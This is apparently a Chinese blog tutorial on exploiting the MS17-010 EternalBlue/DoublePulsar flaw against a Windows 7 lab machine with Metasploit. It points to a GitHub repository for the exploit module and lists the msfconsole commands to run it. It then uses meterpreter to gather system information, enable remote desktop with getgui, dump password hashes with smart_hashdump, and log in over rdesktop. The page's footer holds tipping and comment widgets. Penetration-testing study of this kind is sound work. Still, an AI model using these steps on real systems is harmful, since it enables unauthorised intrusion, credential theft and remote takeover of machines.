Metasploit渗透测试(双脉冲星)

MS17-010(EternalBlue)

靶机:win7:service Pack1 172.16.5.201

靶机下载

攻击机:kali 172.16.5.158

而且要保证两台机器之间可以ping通

因为kali里面没有这个rb源代码 所以我们要把这个模块导入进去

image.png
我们先要smb模块下载到这里面

#cd /usr/share/metasploit-framework/modules/exploits/windows/smb
#https://github.com/1stPeak/Eternalblue-Doublepulsar-Metasploit-master

将Eternalblue-Doublepulsar-Metasploit文件夹depseternalblue_doublepulsar.rb复制到/smb目录下然后删除EternalblueDoublepulsar-Metasploit文件夹

#apt-get update 更新kali

#apt-get install wine32 安装wine32

win32(兼容层) 可以在Linux操作系统上运行 Windows 应用的兼容层

#msfconsole 开启Msf控制台

#use exploit/windows/smb/eternalblue_doublepulsar

#show options 看设置选项

#set RHOST 172.16.5.201

#set PROCESSINJECT explorer.exe

#exploit 执行利用
image.png

这个时候我们就进入了后渗透模块 如果不知道用什么命令可以 -h

查看目标机的系统信息

meterpreter> sysinfo

image.png

meterpreter> run getgui -e

开启靶机远程桌面

meterpreter >run———— windows/gather/smart_hashdump

获取了账号和密码使用 rdesktop 进行远程连接

rdesktop 172.16.5.201

image.png
最后可以看到已经连接到靶机了,说明渗透成功,如果对大家有帮助话麻烦大家一键三连谢谢大家!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

落寞的魚丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值